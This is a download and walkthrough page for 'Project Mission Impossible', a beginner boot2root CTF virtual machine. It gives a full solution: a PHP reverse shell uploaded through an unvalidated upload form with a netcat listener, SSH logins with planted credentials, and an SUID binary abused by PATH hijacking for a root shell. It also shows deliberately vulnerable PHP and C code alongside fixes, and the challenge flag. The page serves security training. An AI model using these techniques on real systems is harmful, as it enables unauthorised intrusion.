🎯 PROJECT MISSION IMPOSSIBLE 🎯

"Your mission, should you choose to accept it..."

A Capture The Flag (CTF) Challenge for Penetration Testing Practice

⬇️ DOWNLOAD .OVA FILE 📖 VIEW WALKTHROUGH

📋 About the Challenge

Project Mission Impossible is a vulnerable virtual machine designed for cybersecurity training and penetration testing practice. Inspired by the Mission Impossible movie franchise, this CTF challenge offers a story-driven hacking experience with multiple exploitation phases.

🎬

Story-Driven

Immersive Mission Impossible themed narrative throughout the challenge

🎓

Educational

Learn web exploitation, privilege escalation, and more

Beginner-Friendly

Perfect for those new to penetration testing

Challenge Information

Property Details
Difficulty Beginner to Intermediate EASY
Type Boot2Root CTF
Platform VirtualBox (.ova format)
OS Debian 13 (Trixie)
File Size ~2.5 GB
Network Bridged or Host-Only

📖 The Mission Story

Welcome to the Impossible Missions Force (IMF). You've been assigned to investigate a compromised secure network containing classified operations spanning multiple missions.

Phase 1: Mission Impossible (1996)

Location: Prague, Czech Republic

Your first objective is to infiltrate the IMF network through their web portal on port 8080. Intelligence suggests there's a vulnerability in their file upload system that could grant you initial access.

Phase 2: Ghost Protocol (2011)

Location: Multiple (Moscow, Dubai, Mumbai)

After gaining initial access as Agent Ethan Hunt, you must investigate the Ghost Protocol server on port 8081. Hidden within the classified files are credentials for Luther Stickell, the IMF's technical specialist.

Phase 3: Rogue Nation (2015)

Location: System Level Access

As Luther Stickell, you've discovered that Agent Ilsa Faust has left behind a powerful tool. Your mission is to find and exploit this tool to escalate your privileges to root level.

Phase 4: The Final Reckoning

Objective: Capture the Flag

With root access achieved, you can finally access the classified final mission briefing and capture the ultimate flag, proving you've mastered the impossible.

⬇️ Download Challenge

⚠️ SECURITY WARNING ⚠️

This virtual machine contains INTENTIONAL VULNERABILITIES for educational purposes.

Only use in isolated lab environments. Never expose to the internet!

Download Options

📥 DOWNLOAD FROM GOOGLE DRIVE

File Information:

  • Filename: Project_Mission_Impossible.ova
  • Size: Approximately 2.5 GB
  • MD5 Checksum: [Generate after upload]
  • Format: Open Virtualization Format (.ova)

Alternative Download

If Google Drive is slow, you can also download from:

⚙️ Setup Instructions

Step 1: Prerequisites

Before you begin, ensure you have:

  • VirtualBox installed (Version 6.0 or higher) - Download Here
  • Kali Linux or another penetration testing OS - Download Here
  • At least 4GB RAM and 20GB disk space available
  • Basic understanding of Linux command line
  • Familiarity with penetration testing tools (nmap, netcat, etc.)
Step 2: Import OVA File
  1. Download the Project_Mission_Impossible.ova file
  2. Open VirtualBox
  3. Go to File → Import Appliance
  4. Click the folder icon and select the downloaded .ova file
  5. Review the settings (2GB RAM, 2 CPU cores recommended)
  6. Click Import and wait for the process to complete

Note: The import process may take 5-10 minutes depending on your system.

Step 3: Network Configuration

Choose one of these network modes:

Option A: Bridged Adapter (Recommended for Beginners)

  1. Right-click the VM → Settings
  2. Go to Network tab
  3. Change "Attached to" to Bridged Adapter
  4. Click OK

The VM will get an IP from your router (e.g., 192.168.1.x)

Option B: Host-Only Adapter (Isolated Lab)

  1. In VirtualBox: File → Host Network Manager
  2. Create a new host-only network if needed
  3. VM Settings → Network → Choose Host-Only Adapter

The VM will be isolated from your home network

Step 4: Start the Machine
  1. Select the Project Mission Impossible VM
  2. Click Start
  3. Wait for the system to boot (approximately 30 seconds)
  4. The system will display the login screen

Find the IP Address:

Login with any user account (or check VirtualBox VM window) to see the IP address. You can also scan your network:

nmap -sn 192.168.1.0/24
Step 5: Begin Your Mission

From your Kali Linux or attacking machine:

# Scan the target
nmap -sV -sC -p- <TARGET_IP>

# Visit the web interface
firefox http://<TARGET_IP>

Your mission begins at port 80. Follow the clues and good luck, Agent! 🎯

🚀 Complete Walkthrough

⚠️ SPOILER ALERT ⚠️

This section contains the complete solution. Try solving it yourself first!

Phase 1: Reconnaissance & Initial Access

Step 1: Port Scanning

nmap -sV -sC -p- <TARGET_IP> -oN scan.txt

Expected Results:

  • Port 22 (SSH)
  • Port 80 (HTTP)
  • Port 8080 (HTTP - Mission Impossible)
  • Port 8081 (HTTP - Ghost Protocol)
  • Port 21 (FTP)
  • Port 110, 143 (POP3, IMAP)

Step 2: Web Enumeration

Visit http://<TARGET_IP> - You'll find a hint pointing to port 8080.

Step 3: Explore Mission Impossible Website

Navigate to http://<TARGET_IP>:8080

  • Explore all 10 buttons/links
  • Read mission briefs (mission1.php, mission2.php, mission3.php)
  • Find the upload.php page

Step 4: Exploit File Upload Vulnerability

Create a PHP reverse shell:

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

# Edit the file and set your IP and port
nano php-reverse-shell.php
# Change: $ip = 'YOUR_KALI_IP';
# Change: $port = 4444;

Step 5: Get Reverse Shell

# Terminal 1: Start listener
nc -lvnp 4444

# Terminal 2: Upload shell.php via upload.php
# Then access: http://<TARGET_IP>:8080/uploads/shell.php

Step 6: Find Credentials

# In your reverse shell:
cat /var/www/uploads/.secret_clue.txt

# Output:
# Username: ethan_hunt
# Password: IMF_Protocol_2024
Phase 2: Lateral Movement (ethan_hunt)

Step 1: SSH as ethan_hunt

ssh ethan_hunt@<TARGET_IP>
# Password: IMF_Protocol_2024

Step 2: Read Mission Briefing

cat ~/MISSION_BRIEFING.txt

The briefing mentions Ghost Protocol on port 8081.

Step 3: Explore Ghost Protocol Website

Visit http://<TARGET_IP>:8081 in your browser.

  • Explore all 5 pages
  • Pay special attention to ethan_personal.php

Step 4: View Page Source

Right-click on ethan_personal.php → View Page Source

Scroll to the bottom to find hidden credentials in HTML comments:

Phase 3: Privilege Escalation (luther_stickell)

Step 1: SSH as luther_stickell

ssh luther_stickell@<TARGET_IP>
# Password: HackerInChief_1996

Step 2: Read Next Mission

cat ~/NEXT_MISSION.txt

Step 3: Search for SUID Binaries

find / -perm -4000 2>/dev/null

Look for unusual binaries. You should find:

/tmp/secret_mission
# or
/usr/local/bin/secret_mission

Step 4: Execute SUID Binary

/tmp/secret_mission

This binary runs with root privileges and displays the final mission file!

Phase 4: Root Access & Flag Capture

Capture the Flag

After executing the SUID binary, you'll see the contents of /root/FINAL_MISSION.txt

The Flag:

IMF{M1SS10N_1MP0SS1BL3_C0MPL3T3D_Y0U_4R3_TH3_M4ST3R_4G3NT}

Alternative: Get Root Shell

For a root shell instead of just reading the file:

# Create malicious 'cat' binary
cd /tmp
echo '#!/bin/bash' > cat
echo '/bin/bash -p' >> cat
chmod +x cat

# Modify PATH
export PATH=/tmp:$PATH

# Execute SUID binary
/tmp/secret_mission

# You now have a root shell!
whoami  # Output: root

Mission Complete! 🎯

Congratulations, Agent! You've successfully completed all phases of Project Mission Impossible.

Attack Chain Summary

  1. 🔍 Port scan reveals web services on ports 80, 8080, 8081
  2. 🌐 Port 80 hints at port 8080
  3. 📤 File upload vulnerability on port 8080 (upload.php)
  4. 🐚 Upload PHP reverse shell → Initial access as www-data
  5. 🔑 Find credentials in .secret_clue.txt → ethan_hunt:IMF_Protocol_2024
  6. 🔐 SSH as ethan_hunt
  7. 🌐 Discover Ghost Protocol on port 8081
  8. 👀 View source code → Find luther_stickell:HackerInChief_1996
  9. 🔐 SSH as luther_stickell
  10. 🔎 Find SUID binary → /tmp/secret_mission
  11. ⚡ Execute SUID binary → Root access
  12. 🚩 Capture flag!

🔓 Vulnerabilities Explained

1. Unrestricted File Upload (CRITICAL)

Location: /upload.php on port 8080

Description: The file upload functionality accepts any file type without validation, allowing attackers to upload malicious PHP scripts.

Vulnerable Code:

<?php
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
    // NO FILE TYPE VALIDATION!
    echo "File uploaded successfully!";
}
?>

Fix:

<?php
$allowed_types = array('jpg', 'jpeg', 'png', 'gif', 'pdf');
$file_ext = strtolower(pathinfo($target_file, PATHINFO_EXTENSION));

if (!in_array($file_ext, $allowed_types)) {
    die("Invalid file type!");
}

// Also check MIME type
$finfo = finfo_open(FILEINFO_MIME_TYPE);
$mime = finfo_file($finfo, $_FILES["fileToUpload"]["tmp_name"]);
// Validate MIME type...
?>

2. Information Disclosure (HIGH)

Location: HTML source code comments

Description: Sensitive credentials are stored in HTML comments, visible to anyone viewing page source.

Vulnerable Code:

<!--
  Username: luther_stickell
  Password: HackerInChief_1996
-->

Fix:

  • Never store credentials in client-side code
  • Remove all sensitive comments before deployment
  • Use environment variables for credentials
  • Implement proper authentication mechanisms

3. SUID Binary Misconfiguration (CRITICAL)

Location: /tmp/secret_mission (or /usr/local/bin/secret_mission)

Description: A binary owned by root with SUID bit set executes system commands, allowing privilege escalation.

Vulnerable Code:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);  // Set UID to root
    setgid(0);  // Set GID to root
    system("/bin/cat /root/FINAL_MISSION.txt");  // Execute as root
    return 0;
}

Fix:

  • Avoid using SUID binaries when possible
  • Never use system() in SUID programs
  • Use execve() with full paths instead
  • Implement proper input validation
  • Drop privileges as soon as possible
  • Regular SUID audit: find / -perm -4000 2>/dev/null

4. Weak Password Policy (MEDIUM)

Description: User accounts have predictable or weak passwords.

Examples:

  • ethan_hunt:IMF_Protocol_2024
  • luther_stickell:HackerInChief_1996

Fix:

  • Enforce strong password policies (minimum 12 characters, complexity requirements)
  • Implement multi-factor authentication (MFA)
  • Use SSH key-based authentication instead of passwords
  • Regular password rotation
  • Monitor for failed login attempts

Learning Objectives

By completing this challenge, you will learn:

  • ✅ How to perform network reconnaissance with nmap
  • ✅ Web application enumeration techniques
  • ✅ File upload vulnerability exploitation
  • ✅ Reverse shell creation and usage
  • ✅ Linux privilege escalation via SUID binaries
  • ✅ Information gathering and lateral movement
  • ✅ Source code analysis for credentials
  • ✅ Post-exploitation techniques

🛠️ Required Tools

🔍

Nmap

Network scanning and port discovery

apt install nmap
🌐

Gobuster

Directory/file brute-forcing

apt install gobuster
🐚

Netcat

Reverse shell listener

apt install netcat
🔐

SSH Client

Remote access

apt install openssh-client
🦊

Firefox/Burp

Web application testing

Pre-installed on Kali

📝

Text Editor

Edit reverse shells

nano / vim

❓ Frequently Asked Questions

Can't find the VM's IP address?

Try these methods:

  1. Login to the VM console and run: ip addr show
  2. From Kali, scan your network: nmap -sn 192.168.1.0/24
  3. Use arp-scan -l to discover all devices
  4. Check your router's DHCP client list
Reverse shell not connecting?

Troubleshooting steps:

  1. Verify your IP address in the PHP shell is correct
  2. Check firewall on your Kali machine: sudo ufw status
  3. Ensure netcat listener is running: nc -lvnp 4444
  4. Try accessing via browser: http://<TARGET_IP>:8080/uploads/shell.php
  5. Check Apache error logs on the VM for PHP errors
Can't find the SUID binary?

The binary might be in multiple locations:

# Try these locations:
ls -la /tmp/secret_mission
ls -la /usr/local/bin/secret_mission
ls -la /home/ilsa_faust/secret_mission

# Search for it:
find / -name "secret_mission" 2>/dev/null
find / -perm -4000 2>/dev/null | grep secret
What if I get stuck?

Don't worry! Here are some hints:

  • Read all mission briefing files carefully - they contain hints
  • Always view page source on web pages
  • Check .bash_history files for clues
  • Look for hidden files with ls -la
  • Refer to the complete walkthrough above
Is this machine safe to run?

This machine contains intentional vulnerabilities and should only be used in isolated lab environments:

  • ✅ Safe: Running on VirtualBox with Host-Only or NAT network
  • ✅ Safe: Running in isolated home lab with no internet access
  • ❌ Unsafe: Exposing to the internet or production networks
  • ❌ Unsafe: Running on public cloud without proper isolation

Always use responsible disclosure practices in real-world scenarios!

📧 Contact & Feedback

Did you enjoy this challenge? Have suggestions or found bugs?

I'd love to hear from you!

📧 Email: [email protected]

🐙 GitHub: https://github.com/ahammednizar

🐦 Twitter: @X

💼 LinkedIn: www.linkedin.com/in/ahammed-nizar-a36853137

Share Your Writeup!

Completed the challenge? Share your writeup with the community!

Tag it with: #ProjectMissionImpossible #CTF #Pentesting

🏆 Credits & Acknowledgments

Created by: [ahammed nizar]

Inspired by: Mission Impossible film franchise, VulnHub, TryHackMe

Special Thanks:

  • 🎬 Mission Impossible franchise for the amazing storylines
  • 🛡️ VulnHub & TryHackMe for CTF inspiration
  • 🐚 Pentestmonkey for the PHP reverse shell
  • 🐧 Debian project for the base OS
  • 🌐 Apache, PHP, and open-source community

Disclaimer:

This vulnerable machine is created purely for educational purposes. The author is not responsible for any misuse. Always obtain proper authorization before testing security on systems you don't own. Practice ethical hacking and responsible disclosure.